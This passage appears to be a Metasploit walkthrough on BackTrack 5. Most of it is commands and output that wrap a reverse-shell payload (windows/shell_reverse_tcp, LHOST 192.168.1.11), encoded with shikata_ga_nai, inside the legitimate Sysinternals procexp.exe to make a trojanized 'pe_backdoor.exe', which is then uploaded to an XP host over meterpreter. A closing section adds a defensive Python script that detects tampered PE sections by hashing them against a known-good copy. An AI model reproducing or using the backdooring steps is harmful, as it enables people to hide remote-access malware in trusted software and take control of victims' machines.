Download Sysinternals from the web and unzip it to get procexp.exe, upload it to BT5, then generate pe_backdoor.exe:
root@bt:/opt/metasploit/msf3# mkdir work
root@bt:/opt/metasploit/msf3# cp ~/procexp.exe work/
root@bt:/opt/metasploit/msf3# ls work/
procexp.exe
root@bt:/opt/metasploit/msf3# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=8080 R | msfencode -t exe -x work/procexp.exe -o pe_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)
real 0m40.713s
user 0m24.734s
sys 0m15.513s
root@bt:/opt/metasploit/msf3# ls
armitage documentation HACKING msfbinscan msfd msfgui msfpescan msfrpcd pe_backdoor.exe scripts THIRD-PARTY.md
COPYING external lib msfcli msfelfscan msfmachscan msfrop msfupdate plugins spec tools
data Gemfile modules msfconsole msfencode msfpayload msfrpc msfvenom README.md test work
root@bt:/opt/metasploit/msf3# file pe_backdoor.exe
pe_backdoor.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
root@bt:/opt/metasploit/msf3# mv pe_backdoor.exe ~/
Upload it to XP:
meterpreter > upload pe_backdoor.exe
[*] uploading : pe_backdoor.exe -> pe_backdoor.exe
[*] uploaded : pe_backdoor.exe -> pe_backdoor.exe
meterpreter >
The antivirus software reports a threat. After renaming the file to hello.exe, it still reports a threat.
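
Renaming a file does not alter its contents, so a defender can run a content-based check of their own against a known-good copy of the original executable. The following is an added example, not from the original post: it hashes each PE section and lists the sections that differ from the reference. The function names and the toy PE builder are assumptions for illustration, and the sample bytes are constructed.

```python
import hashlib
import struct

def section_hashes(pe: bytes) -> dict:
    """Map each PE section name to the SHA-256 of its raw data on disk."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (nsections,) = struct.unpack_from("<H", pe, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", pe, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    hashes = {}
    for i in range(nsections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        label = name.rstrip(b"\0").decode("latin-1")
        hashes[label] = hashlib.sha256(pe[raw_ptr:raw_ptr + raw_size]).hexdigest()
    return hashes

def changed_sections(reference: bytes, candidate: bytes) -> list:
    """Names of sections added, removed or altered relative to the known-good reference."""
    ref, cand = section_hashes(reference), section_hashes(candidate)
    return sorted(n for n in ref.keys() | cand.keys() if ref.get(n) != cand.get(n))

def build_toy_pe(sections) -> bytes:
    """Constructed sample: a minimal PE-shaped file (headers + raw sections), not a runnable program."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)            # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    data_start = 64 + 24 + 40 * len(sections)
    table, body = b"", b""
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(data), 0, len(data),
                             data_start + len(body), 0, 0, 0, 0, 0)
        body += data
    return dos + coff + table + body

# Constructed inputs: ORIGINAL stands in for the vendor's file, MODIFIED for a file of the
# same shape whose code section differs. The file name plays no part in the check.
ORIGINAL = build_toy_pe([(b".text", b"\x90" * 32), (b".rdata", b"strings"), (b".rsrc", b"icon")])
MODIFIED = build_toy_pe([(b".text", b"\xcc" * 32), (b".rdata", b"strings"), (b".rsrc", b"icon")])

if __name__ == "__main__":
    print("changed vs reference:", changed_sections(ORIGINAL, MODIFIED))
    print("whole-file match:", hashlib.sha256(ORIGINAL).digest() == hashlib.sha256(MODIFIED).digest())
```

In practice the reference would be the vendor's original download, read with `open(path, "rb").read()`.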